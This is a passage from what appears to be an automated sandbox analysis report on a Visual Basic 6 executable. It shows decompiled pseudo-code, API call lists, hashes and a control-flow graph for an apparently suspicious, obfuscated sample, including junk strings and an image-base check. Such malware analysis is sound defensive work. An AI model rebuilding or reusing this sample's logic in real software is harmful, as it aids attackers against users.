      				char* _v168;
      				char _v176;
      				void* _v212;
      				signed int _v216;
      				void* _v220;
      				signed int _v224;
      				signed int _v240;
      				intOrPtr _v244;
      				intOrPtr* _v248;
      				signed int _v252;
      				intOrPtr* _v256;
      				signed int _v260;
      				signed int _v264;
      				intOrPtr* _v268;
      				signed int _v272;
      				signed int _v276;
      				intOrPtr* _v280;
      				signed int _v284;
      				signed int _v288;
      				signed int* _t220;
      				short _t224;
      				short _t228;
      				char* _t233;
      				short _t237;
      				char* _t243;
      				short _t247;
      				signed int _t251;
      				signed int _t263;
      				signed int _t268;
      				signed int _t269;
      				signed int _t283;
      				signed int _t288;
      				signed int _t294;
      				signed int _t300;
      				char* _t305;
      				char* _t306;
      				signed int _t309;
      				void* _t339;
      				void* _t341;
      				intOrPtr _t342;
      				void* _t343;
      
      				_t342 = _t341 - 0x10;
      				 *[fs:0x0] = _t342;
      				L004013D0();
      				_v20 = _t342;
      				_v16 = 0x401210;
      				_v12 = 0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013d6, _t339);
      				_push( &_v80);
      				L0040156E();
      				_push( &_v80);
      				_t220 =  &_v52;
      				_push(_t220);
      				L00401574();
      				_push(_t220);
      				_push( &_v96);
      				L0040157A();
      				_push( &_v112);
      				L0040156E();
      				_push( &_v96);
      				_t224 =  &_v112;
      				_push(_t224);
      				L00401580();
      				_v212 = _t224;
      				L0040161C();
      				_push( &_v112);
      				_push( &_v96);
      				_push( &_v80);
      				_push(3);
      				L00401592();
      				_t343 = _t342 + 0x10;
      				_t228 = _v212;
      				if(_t228 != 0) {
      					_push(L"Indemnitor");
      					L00401568();
      				}
      				_push(0x413f68);
      				L00401562();
      				if(_t228 != 2) {
      					if( *0x41d4b0 != 0) {
      						_v248 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v248 = 0x41d4b0;
      					}
      					_v212 =  *_v248;
      					_t305 =  &_v80;
      					L00401556();
      					_t343 = _t343 + 0x10;
      					L0040155C();
      					_t306 =  &_v60;
      					L004015DA();
      					_t309 =  *((intOrPtr*)( *_v212 + 0xc))(_v212, _t306, _t306, _t305, _t305, _t305, _v36, L"EExegfEkR01xvwpU32zqIKzhTg7Bg167", 0);
      					asm("fclex");
      					_v216 = _t309;
      					if(_v216 >= 0) {
      						_v252 = _v252 & 0x00000000;
      					} else {
      						_push(0xc);
      						_push(0x413afc);
      						_push(_v212);
      						_push(_v216);
      						L00401622();
      						_v252 = _t309;
      					}
      					L004015D4();
      					L0040160A();
      				}
      				_push( &_v80);
      				L0040156E();
      				_push( &_v96);
      				L0040156E();
      				_v152 = 1;
      				_v160 = 2;
      				_push(1);
      				_push(1);
      				_push( &_v96);
      				_push( &_v160);
      				_t233 =  &_v112;
      				_push(_t233);
      				L0040154A();
      				_push(_t233);
      				_push( &_v80);
      				_push(0x413a7c);
      				_push( &_v128);
      				L00401550();
      				_v168 = 1;
      				_v176 = 0x8002;
      				_push( &_v128);
      				_t237 =  &_v176;
      				_push(_t237);
      				L00401580();
      				_v212 = _t237;
      				_push( &_v128);
      				_push( &_v112);
      				_push( &_v80);
      				_push( &_v96);
      				_push(4);
      				L00401592();
      				if(_v212 != 0) {
      					if( *0x41d4b0 != 0) {
      						_v256 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v256 = 0x41d4b0;
      					}
      					_v212 =  *_v256;
      					_t294 =  *((intOrPtr*)( *_v212 + 0x4c))(_v212,  &_v60);
      					asm("fclex");
      					_v216 = _t294;
      					if(_v216 >= 0) {
      						_v260 = _v260 & 0x00000000;
      					} else {
      						_push(0x4c);
      						_push(0x413afc);
      						_push(_v212);
      						_push(_v216);
      						L00401622();
      						_v260 = _t294;
      					}
      					_v220 = _v60;
      					_v152 = 0xc9;
      					_v160 = 2;
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t300 =  *((intOrPtr*)( *_v220 + 0x1c))(_v220, 0x10,  &_v64);
      					asm("fclex");
      					_v224 = _t300;
      					if(_v224 >= 0) {
      						_v264 = _v264 & 0x00000000;
      					} else {
      						_push(0x1c);
      						_push(0x413368);
      						_push(_v220);
      						_push(_v224);
      						L00401622();
      						_v264 = _t300;
      					}
      					_v240 = _v64;
      					_v64 = _v64 & 0x00000000;
      					_push(_v240);
      					_push( &_v32);
      					L004015F8();
      					L004015D4();
      				}
      				_v72 = 0x17;
      				_v80 = 2;
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xfffffffe);
      				_push(0xffffffff);
      				_t243 =  &_v80;
      				_push(_t243);
      				L00401544();
      				L0040162E();
      				L0040160A();
      				_push(0x413a84);
      				_push(0x413a84);
      				L00401538();
      				_v72 = _t243;
      				_v80 = 8;
      				_push(1);
      				_push( &_v80);
      				_push( &_v96);
      				L0040153E();
      				_v152 = 0x413a84;
      				_v160 = 0x8008;
      				_push( &_v96);
      				_t247 =  &_v160;
      				_push(_t247);
      				L00401580();
      				_v212 = _t247;
      				_push( &_v96);
      				_push( &_v80);
      				_push(2);
      				L00401592();
      				if(_v212 != 0) {
      					if( *0x41d4b0 != 0) {
      						_v268 = 0x41d4b0;
      					} else {
      						_push(0x41d4b0);
      						_push(0x413b0c);
      						L00401628();
      						_v268 = 0x41d4b0;
      					}
      					_v212 =  *_v268;
      					_t283 =  *((intOrPtr*)( *_v212 + 0x4c))(_v212,  &_v60);
      					asm("fclex");
      					_v216 = _t283;
      					if(_v216 >= 0) {
      						_v272 = _v272 & 0x00000000;
      					} else {
      						_push(0x4c);
      						_push(0x413afc);
      						_push(_v212);
      						_push(_v216);
      						L00401622();
      						_v272 = _t283;
      					}
      					_v220 = _v60;
      					_v152 = 1;
      					_v160 = 2;
      					L004013D0();
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t288 =  *((intOrPtr*)( *_v220 + 0x2c))(_v220, 0x10);
      					asm("fclex");
      					_v224 = _t288;
      					if(_v224 >= 0) {
      						_v276 = _v276 & 0x00000000;
      					} else {
      						_push(0x2c);
      						_push(0x413368);
      						_push(_v220);
      						_push(_v224);
      						L00401622();
      						_v276 = _t288;
      					}
      					L004015D4();
      				}
      				_push(0);
      				L00401532();
      				_v72 = 9;
      				_v80 = 2;
      				_t251 =  &_v80;
      				_push(_t251);
      				L00401526();
      				L0040162E();
      				_push(_t251);
      				_push(0x413708);
      				_push(0x413708);
      				L00401538();
      				L0040162E();
      				_push(_t251);
      				L0040152C();
      				asm("sbb eax, eax");
      				_v212 =  ~( ~( ~_t251));
      				_push( &_v56);
      				_push( &_v52);
      				_push(2);
      				L00401634();
      				L0040160A();
      				if(_v212 != 0) {
      					_v120 = 0x80020004;
      					_v128 = 0xa;
      					_v104 = 0x80020004;
      					_v112 = 0xa;
      					_v88 = 0x80020004;
      					_v96 = 0xa;
      					_v152 = L"usynlighedens";
      					_v160 = 8;
      					L004015B6();
      					_push( &_v128);
      					_push( &_v112);
      					_push( &_v96);
      					_push(0);
      					_push( &_v80);
      					L00401520();
      					_push( &_v128);
      					_push( &_v112);
      					_push( &_v96);
      					_push( &_v80);
      					_push(4);
      					L00401592();
      				}
      				if( *0x41d4b0 != 0) {
      					_v280 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v280 = 0x41d4b0;
      				}
      				_v212 =  *_v280;
      				_t263 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v60);
      				asm("fclex");
      				_v216 = _t263;
      				if(_v216 >= 0) {
      					_v284 = _v284 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v212);
      					_push(_v216);
      					L00401622();
      					_v284 = _t263;
      				}
      				_v220 = _v60;
      				_t268 =  *((intOrPtr*)( *_v220 + 0xe8))(_v220,  &_v52);
      				asm("fclex");
      				_v224 = _t268;
      				if(_v224 >= 0) {
      					_v288 = _v288 & 0x00000000;
      				} else {
      					_push(0xe8);
      					_push(0x413fd0);
      					_push(_v220);
      					_push(_v224);
      					L00401622();
      					_v288 = _t268;
      				}
      				_t269 = _v52;
      				_v244 = _t269;
      				_v52 = _v52 & 0x00000000;
      				L0040162E();
      				L004015D4();
      				_v44 = 0x346f;
      				_push(0x416f0b);
      				L004015D4();
      				L004015D4();
      				L0040161C();
      				L0040161C();
      				return _t269;
      			}



































































      0x00416791
      0x004167a0
      0x004167ac
      0x004167b4
      0x004167b7
      0x004167be
      0x004167c5
      0x004167d4
      0x004167da
      0x004167db
      0x004167e3
      0x004167e4
      0x004167e7
      0x004167e8
      0x004167ed
      0x004167f1
      0x004167f2
      0x004167fa
      0x004167fb
      0x00416803
      0x00416804
      0x00416807
      0x00416808
      0x0041680d
      0x00416817
      0x0041681f
      0x00416823
      0x00416827
      0x00416828
      0x0041682a
      0x0041682f
      0x00416832
      0x0041683b
      0x0041683d
      0x00416842
      0x00416842
      0x00416847
      0x0041684c
      0x00416854
      0x00416861
      0x0041687e
      0x00416863
      0x00416863
      0x00416868
      0x0041686d
      0x00416872
      0x00416872
      0x00416890
      0x004168a0
      0x004168a4
      0x004168a9
      0x004168ad
      0x004168b3
      0x004168b7
      0x004168cb
      0x004168ce
      0x004168d0
      0x004168dd
      0x004168ff
      0x004168df
      0x004168df
      0x004168e1
      0x004168e6
      0x004168ec
      0x004168f2
      0x004168f7
      0x004168f7
      0x00416909
      0x00416911
      0x00416911
      0x00416919
      0x0041691a
      0x00416922
      0x00416923
      0x00416928
      0x00416932
      0x0041693c
      0x0041693e
      0x00416943
      0x0041694a
      0x0041694b
      0x0041694e
      0x0041694f
      0x00416954
      0x00416958
      0x00416959
      0x00416961
      0x00416962
      0x00416967
      0x00416971
      0x0041697e
      0x0041697f
      0x00416985
      0x00416986
      0x0041698b
      0x00416995
      0x00416999
      0x0041699d
      0x004169a1
      0x004169a2
      0x004169a4
      0x004169b5
      0x004169c2
      0x004169df
      0x004169c4
      0x004169c4
      0x004169c9
      0x004169ce
      0x004169d3
      0x004169d3
      0x004169f1
      0x00416a09
      0x00416a0c
      0x00416a0e
      0x00416a1b
      0x00416a3d
      0x00416a1d
      0x00416a1d
      0x00416a1f
      0x00416a24
      0x00416a2a
      0x00416a30
      0x00416a35
      0x00416a35
      0x00416a47
      0x00416a4d
      0x00416a57
      0x00416a68
      0x00416a75
      0x00416a76
      0x00416a77
      0x00416a78
      0x00416a87
      0x00416a8a
      0x00416a8c
      0x00416a99
      0x00416abb
      0x00416a9b
      0x00416a9b
      0x00416a9d
      0x00416aa2
      0x00416aa8
      0x00416aae
      0x00416ab3
      0x00416ab3
      0x00416ac5
      0x00416acb
      0x00416acf
      0x00416ad8
      0x00416ad9
      0x00416ae1
      0x00416ae1
      0x00416ae6
      0x00416aed
      0x00416af4
      0x00416af6
      0x00416af8
      0x00416afa
      0x00416afc
      0x00416aff
      0x00416b00
      0x00416b0a
      0x00416b12
      0x00416b17
      0x00416b1c
      0x00416b21
      0x00416b26
      0x00416b29
      0x00416b30
      0x00416b35
      0x00416b39
      0x00416b3a
      0x00416b3f
      0x00416b49
      0x00416b56
      0x00416b57
      0x00416b5d
      0x00416b5e
      0x00416b63
      0x00416b6d
      0x00416b71
      0x00416b72
      0x00416b74
      0x00416b85
      0x00416b92
      0x00416baf
      0x00416b94
      0x00416b94
      0x00416b99
      0x00416b9e
      0x00416ba3
      0x00416ba3
      0x00416bc1
      0x00416bd9
      0x00416bdc
      0x00416bde
      0x00416beb
      0x00416c0d
      0x00416bed
      0x00416bed
      0x00416bef
      0x00416bf4
      0x00416bfa
      0x00416c00
      0x00416c05
      0x00416c05
      0x00416c17
      0x00416c1d
      0x00416c27
      0x00416c34
      0x00416c41
      0x00416c42
      0x00416c43
      0x00416c44
      0x00416c53
      0x00416c56
      0x00416c58
      0x00416c65
      0x00416c87
      0x00416c67
      0x00416c67
      0x00416c69
      0x00416c6e
      0x00416c74
      0x00416c7a
      0x00416c7f
      0x00416c7f
      0x00416c91
      0x00416c91
      0x00416c96
      0x00416c98
      0x00416c9d
      0x00416ca4
      0x00416cab
      0x00416cae
      0x00416caf
      0x00416cb9
      0x00416cbe
      0x00416cbf
      0x00416cc4
      0x00416cc9
      0x00416cd3
      0x00416cd8
      0x00416cd9
      0x00416ce0
      0x00416ce6
      0x00416cf0
      0x00416cf4
      0x00416cf5
      0x00416cf7
      0x00416d02
      0x00416d10
      0x00416d12
      0x00416d19
      0x00416d20
      0x00416d27
      0x00416d2e
      0x00416d35
      0x00416d3c
      0x00416d46
      0x00416d59
      0x00416d61
      0x00416d65
      0x00416d69
      0x00416d6a
      0x00416d6f
      0x00416d70
      0x00416d78
      0x00416d7c
      0x00416d80
      0x00416d84
      0x00416d85
      0x00416d87
      0x00416d8c
      0x00416d96
      0x00416db3
      0x00416d98
      0x00416d98
      0x00416d9d
      0x00416da2
      0x00416da7
      0x00416da7
      0x00416dc5
      0x00416ddd
      0x00416de0
      0x00416de2
      0x00416def
      0x00416e11
      0x00416df1
      0x00416df1
      0x00416df3
      0x00416df8
      0x00416dfe
      0x00416e04
      0x00416e09
      0x00416e09
      0x00416e1b
      0x00416e33
      0x00416e39
      0x00416e3b
      0x00416e48
      0x00416e6d
      0x00416e4a
      0x00416e4a
      0x00416e4f
      0x00416e54
      0x00416e5a
      0x00416e60
      0x00416e65
      0x00416e65
      0x00416e74
      0x00416e77
      0x00416e7d
      0x00416e8a
      0x00416e92
      0x00416e97
      0x00416e9d
      0x00416eed
      0x00416ef5
      0x00416efd
      0x00416f05
      0x00416f0a

      APIs
      • __vbaChkstk.MSVBVM60(?,004013D6), ref: 004167AC
      • #610.MSVBVM60(?,?,?,?,?,004013D6), ref: 004167DB
      • __vbaStrVarVal.MSVBVM60(?,?,?,?,?,?,?,004013D6), ref: 004167E8
      • #540.MSVBVM60(?,00000000,?,?,?,?,?,?,?,004013D6), ref: 004167F2
      • #610.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,004013D6), ref: 004167FB
      • __vbaVarTstNe.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,004013D6), ref: 00416808
      • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,?,?,?,?,?,004013D6), ref: 00416817
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0041682A
      • #532.MSVBVM60(Indemnitor,?,?,?,004013D6), ref: 00416842
      • __vbaLenBstrB.MSVBVM60(00413F68,?,?,?,004013D6), ref: 0041684C
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,00413F68,?,?,?,004013D6), ref: 0041686D
      • __vbaLateMemCallLd.MSVBVM60(?,?,EExegfEkR01xvwpU32zqIKzhTg7Bg167,00000000), ref: 004168A4
      • __vbaObjVar.MSVBVM60(00000000,?,?,?,00413F68,?,?,?,004013D6), ref: 004168AD
      • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,?,?,?,00413F68,?,?,?,004013D6), ref: 004168B7
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,0000000C), ref: 004168F2
      • __vbaFreeObj.MSVBVM60(00000000,?,00413AFC,0000000C), ref: 00416909
      • __vbaFreeVar.MSVBVM60(00000000,?,00413AFC,0000000C), ref: 00416911
      • #610.MSVBVM60(?,00413F68,?,?,?,004013D6), ref: 0041691A
      • #610.MSVBVM60(?,?,00413F68,?,?,?,004013D6), ref: 00416923
      • __vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001), ref: 0041694F
      • #662.MSVBVM60(?,00413A7C,?,00000000,?,00000002,?,00000001,00000001), ref: 00416962
      • __vbaVarTstNe.MSVBVM60(00008002,?,?,00413A7C,?,00000000,?,00000002,?,00000001,00000001), ref: 00416986
      • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,00413A7C,?,00000000,?,00000002,?,00000001,00000001), ref: 004169A4
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,?,?,?,?,00413F68,?,?,?,004013D6), ref: 004169CE
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,0000004C), ref: 00416A30
      • __vbaChkstk.MSVBVM60(?), ref: 00416A68
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413368,0000001C), ref: 00416AAE
      • __vbaObjSet.MSVBVM60(?,?), ref: 00416AD9
      • __vbaFreeObj.MSVBVM60(?,?), ref: 00416AE1
      • #702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416B00
      • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416B0A
      • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416B12
      • __vbaStrCat.MSVBVM60(00413A84,00413A84,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416B21
      • #617.MSVBVM60(?,00000008,00000001,00413A84,00413A84,00000002,000000FF,000000FE,000000FE,000000FE), ref: 00416B3A
      • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000008,00000001,00413A84), ref: 00416B5E
      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00416B74
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0,?,?,?,?,?,?,?,00413F68,?,?,?,004013D6), ref: 00416B9E
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,0000004C), ref: 00416C00
      • __vbaChkstk.MSVBVM60(00000000,?,00413AFC,0000004C), ref: 00416C34
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413368,0000002C), ref: 00416C7A
      • __vbaFreeObj.MSVBVM60(00000000,?,00413368,0000002C), ref: 00416C91
      • __vbaOnError.MSVBVM60(00000000,?,?,?,?,?,?,?,00413F68,?,?,?,004013D6), ref: 00416C98
      • #574.MSVBVM60(00000002), ref: 00416CAF
      • __vbaStrMove.MSVBVM60(00000002), ref: 00416CB9
      • __vbaStrCat.MSVBVM60(00413708,00413708,00000000,00000002), ref: 00416CC9
      • __vbaStrMove.MSVBVM60(00413708,00413708,00000000,00000002), ref: 00416CD3
      • __vbaStrCmp.MSVBVM60(00000000,00413708,00413708,00000000,00000002), ref: 00416CD9
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00413708,00413708,00000000,00000002), ref: 00416CF7
      • __vbaFreeVar.MSVBVM60 ref: 00416D02
      • __vbaVarDup.MSVBVM60 ref: 00416D59
      • #595.MSVBVM60(00000002,00000000,0000000A,0000000A,0000000A), ref: 00416D70
      • __vbaFreeVarList.MSVBVM60(00000004,00000002,0000000A,0000000A,0000000A,00000002,00000000,0000000A,0000000A,0000000A), ref: 00416D87
      • __vbaNew2.MSVBVM60(00413B0C,0041D4B0), ref: 00416DA2
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413AFC,00000014), ref: 00416E04
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00413FD0,000000E8), ref: 00416E60
      • __vbaStrMove.MSVBVM60(00000000,?,00413FD0,000000E8), ref: 00416E8A
      • __vbaFreeObj.MSVBVM60(00000000,?,00413FD0,000000E8), ref: 00416E92
      • __vbaFreeObj.MSVBVM60(00416F0B), ref: 00416EED
      • __vbaFreeObj.MSVBVM60(00416F0B), ref: 00416EF5
      • __vbaFreeStr.MSVBVM60(00416F0B), ref: 00416EFD
      • __vbaFreeStr.MSVBVM60(00416F0B), ref: 00416F05
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.753142700.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.753129547.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.753201545.000000000041D000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.753211230.000000000041F000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_PP05492110.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresult$List$#610MoveNew2$Chkstk$#532#540#574#595#617#662#702AddrefBstrCallErrorLate
      • String ID: EExegfEkR01xvwpU32zqIKzhTg7Bg167$Indemnitor$h?A$o4$usynlighedens
      • API String ID: 3604031058-2790578208
      • Opcode ID: 15701f3af5c348243824a356f889269657e12fa827b6c33471750b65f5387f07
      • Instruction ID: aa2c72cc5e6a8716b934d4df020689cc54a4f1e337092635f248bc4f2f665af3
      • Opcode Fuzzy Hash: 15701f3af5c348243824a356f889269657e12fa827b6c33471750b65f5387f07
      • Instruction Fuzzy Hash: F512EAB1D00218AFDB20EF91CC45FDDB7B8AF04305F1085ABE119BB191DB799A858F68
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 732 41a6be-41a717 __vbaChkstk __vbaAryConstruct2 734 41a734 732->734 735 41a719-41a732 __vbaNew2 732->735 736 41a73e-41a770 734->736 735->736 738 41a792 736->738 739 41a772-41a790 __vbaHresultCheckObj 736->739 740 41a799-41a7cc 738->740 739->740 742 41a7f1 740->742 743 41a7ce-41a7ef __vbaHresultCheckObj 740->743 744 41a7f8-41a821 __vbaFreeObj 742->744 743->744 745 41a823-41a82a #570 744->745 746 41a82d-41a84b call 4134fc __vbaSetSystemError 744->746 745->746 749 41a885-41a893 746->749 750 41a84d-41a880 __vbaVarDup #600 __vbaFreeVar 746->750 751 41a895-41a89c 749->751 752 41a89e-41a8a3 __vbaGenerateBoundsError 749->752 750->749 753 41a8a9-41a8cc 751->753 752->753 754 41a8d7-41a8dc __vbaGenerateBoundsError 753->754 755 41a8ce-41a8d5 753->755 756 41a8e2-41a929 #683 __vbaFpR8 754->756 755->756 757 41a92f-41aa3b __vbaVarDup #596 __vbaStrMove __vbaFreeVarList 756->757 758 41aa3e-41aaa6 #613 __vbaStrVarMove __vbaStrMove __vbaFreeVarList 756->758 757->758 760 41aac8 758->760 761 41aaa8-41aac6 __vbaHresultCheckObj 758->761 762 41aacf-41aaf3 760->762 761->762 764 41ab15 762->764 765 41aaf5-41ab13 __vbaHresultCheckObj 762->765 766 41ab1c-41ab27 764->766 765->766 767 41ab29 __vbaEnd 766->767 768 41ab2e-41ab35 766->768 767->768 769 41ab52 768->769 770 41ab37-41ab50 __vbaNew2 768->770 771 41ab5c-41ab8e 769->771 770->771 773 41abb0 771->773 774 41ab90-41abae __vbaHresultCheckObj 771->774 775 41abb7-41abe7 773->775 774->775 777 41abe9-41ac0a __vbaHresultCheckObj 775->777 778 41ac0c 775->778 779 41ac13-41ac3d __vbaStrMove __vbaFreeObj 777->779 778->779 780 41ac5a 779->780 781 41ac3f-41ac58 __vbaNew2 779->781 782 41ac64-41ac96 780->782 781->782 784 41acb8 782->784 785 41ac98-41acb6 __vbaHresultCheckObj 782->785 786 41acbf-41acf2 784->786 785->786 788 41acf4-41ad15 __vbaHresultCheckObj 786->788 789 41ad17 786->789 790 41ad1e-41ad6e __vbaFreeObj __vbaVarErrI4 #559 __vbaFreeVar 788->790 789->790 791 41ad74-41ad7b 790->791 792 41ae9e-41af2d __vbaAryDestruct __vbaFreeStr * 4 790->792 794 41ad98 791->794 795 41ad7d-41ad96 __vbaNew2 791->795 796 41ada2-41add4 794->796 795->796 798 41adf6 796->798 799 41add6-41adf4 __vbaHresultCheckObj 796->799 800 41adfd-41ae52 __vbaChkstk 798->800 799->800 802 41ae74 800->802 803 41ae54-41ae72 __vbaHresultCheckObj 800->803 804 41ae7b-41ae99 __vbaStrMove __vbaFreeObj 802->804 803->804 804->792
      C-Code - Quality: 56%
      			E0041A6BE(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				long long* _v16;
      				intOrPtr _v36;
      				char _v48;
      				intOrPtr _v56;
      				void* _v60;
      				intOrPtr _v64;
      				void* _v68;
      				void* _v72;
      				short _v76;
      				char _v92;
      				intOrPtr _v96;
      				long long _v104;
      				void* _v108;
      				signed int _v112;
      				char _v116;
      				intOrPtr _v124;
      				char _v132;
      				char* _v140;
      				char _v148;
      				char* _v156;
      				char _v164;
      				char* _v172;
      				char _v180;
      				char* _v188;
      				char _v196;
      				char* _v204;
      				char _v212;
      				char* _v220;
      				char _v228;
      				char* _v236;
      				char _v244;
      				void* _v344;
      				char _v348;
      				signed int _v352;
      				signed int _v356;
      				void* _v360;
      				signed int _v364;
      				short _v368;
      				signed int _v380;
      				signed int _v384;
      				intOrPtr* _v388;
      				signed int _v392;
      				signed int _v396;
      				signed int _v400;
      				signed int _v404;
      				signed int _v408;
      				signed int _v412;
      				intOrPtr* _v416;
      				signed int _v420;
      				signed int _v424;
      				intOrPtr* _v428;
      				signed int _v432;
      				signed int _v436;
      				intOrPtr* _v440;
      				signed int _v444;
      				signed int _v448;
      				signed int _t266;
      				signed int _t271;
      				short _t275;
      				signed int _t276;
      				signed int _t277;
      				signed int _t288;
      				signed int _t292;
      				signed int _t299;
      				signed int _t304;
      				signed int _t311;
      				signed int _t316;
      				char* _t318;
      				char* _t321;
      				signed int _t327;
      				signed int _t333;
      				intOrPtr _t352;
      				void* _t381;
      				void* _t383;
      				long long* _t384;
      				void* _t393;
      				long long _t409;
      				long long _t412;
      
      				_t409 = __fp0;
      				_t384 = _t383 - 0xc;
      				 *[fs:0x0] = _t384;
      				L004013D0();
      				_v16 = _t384;
      				_v12 = 0x4012b0;
      				_v8 = 0;
      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4013d6, _t381);
      				_push(5);
      				_push(0x414198);
      				_push( &_v48);
      				L0040151A();
      				if( *0x41d4b0 != 0) {
      					_v388 = 0x41d4b0;
      				} else {
      					_push(0x41d4b0);
      					_push(0x413b0c);
      					L00401628();
      					_v388 = 0x41d4b0;
      				}
      				_v352 =  *_v388;
      				_t266 =  *((intOrPtr*)( *_v352 + 0x14))(_v352,  &_v116);
      				asm("fclex");
      				_v356 = _t266;
      				if(_v356 >= 0) {
      					_v392 = _v392 & 0x00000000;
      				} else {
      					_push(0x14);
      					_push(0x413afc);
      					_push(_v352);
      					_push(_v356);
      					L00401622();
      					_v392 = _t266;
      				}
      				_v360 = _v116;
      				_t271 =  *((intOrPtr*)( *_v360 + 0x100))(_v360,  &_v348);
      				asm("fclex");
      				_v364 = _t271;
      				if(_v364 >= 0) {
      					_v396 = _v396 & 0x00000000;
      				} else {
      					_push(0x100);
      					_push(0x413fd0);
      					_push(_v360);
      					_push(_v364);
      					L00401622();
      					_v396 = _t271;
      				}
      				_v368 =  ~(0 | _v348 != 0x00400000);
      				L004015D4();
      				_t275 = _v368;
      				if(_t275 != 0) {
      					_push(0xb);
      					L004014AE();
      					_v64 = _t275;
      				}
      				_t276 =  &_v92;
      				_push(_t276);
      				E004134FC();
      				_v348 = _t276;
      				L0040164C();
      				if(_v348 == 0x1b2321) {
      					_v236 = L"Overblind";
      					_v244 = 8;
      					L004015B6();
      					_push(2);
      					_t276 =  &_v132;
      					_push(_t276);
      					L004015BC();
      					_v104 = _t409;
      					L0040160A();
      				}
      				_v352 = _v352 & 0x00000000;
      				if(_v352 >= 2) {
      					L00401514();
      					_v400 = _t276;
      				} else {
      					_v400 = _v400 & 0x00000000;
      				}
      				_t277 = _v352;
      				 *((long long*)(_v36 + _t277 * 8)) =  *0x4012a8;
      				_v352 = 1;
      				_t393 = _v352 - 2;
      				if(_t393 >= 0) {
      					L00401514();
      					_v404 = _t277;
      				} else {
      					_v404 = _v404 & 0x00000000;
      				}
      				_t352 = _v36;
      				 *((long long*)(_t352 + _v352 * 8)) =  *0x4012a0;
      				_v348 =  &_v48;
      				_t412 =  *0x4011e0;
      				_push(_t352);
      				_push(_t352);
      				 *_t384 = _t412;
      				asm("fld1");
      				_push(_t352);
      				_push(_t352);
      				 *_t384 = _t412;
      				_push( &_v348);
      				L004014A8();
      				L004014F0();
      				asm("fcomp qword [0x401298]");
      				asm("fnstsw ax");
      				asm("sahf");
      				if(_t393 != 0) {
      					_v220 = 0x80020004;
      					_v228 = 0xa;
      					_v204 = 0x80020004;
      					_v212 = 0xa;
      					_v188 = 0x80020004;
      					_v196 = 0xa;
      					_v172 = 0x80020004;
      					_v180 = 0xa;
      					_v156 = 0x80020004;
      					_v164 = 0xa;
      					_v140 = 0x80020004;
      					_v148 = 0xa;
      					_v236 = L"frafrsel";
      					_v244 = 8;
      					L004015B6();
      					_push( &_v228);
      					_push( &_v212);
      					_push( &_v196);
      					_push( &_v180);
      					_push( &_v164);
      					_push( &_v148);
      					_push( &_v132);
      					L0040158C();
      					L0040162E();
      					_push( &_v228);
      					_push( &_v212);
      					_push( &_v196);
      					_push( &_v180);
      					_push( &_v164);
      					_push( &_v148);
      					_push( &_v132);
      					_push(7);
      					L00401592();
      					_t384 = _t384 + 0x20;
      				}
      				_v124 = 2;
      				_v132 = 2;
      				L0040149C();
      				L004014A2();
      				L0040162E();
      				L00401592();
      				_t288 =  *((intOrPtr*)( *_a4 + 0x114))(_a4, 1, 2,  &_v132,  &_v148,  &_v148,  &_v148,  &_v132);
      				asm("fclex");
      				_v352 = _t288;
      				if(_v352 >= 0) {
      					_v408 = _v408 & 0x00000000;
      				} else {
      					_push(0x114);
      					_push(0x4120bc);
      					_push(_a4);
      					_push(_v352);
      					L00401622();
      					_v408 = _t288;
      				}
      				_t292 =  *((intOrPtr*)( *_a4 + 0x110))(_a4,  &_v344);
      				asm("fclex");
      				_v352 = _t292;
      				if(_v352 >= 0) {
      					_v412 = _v412 & 0x00000000;
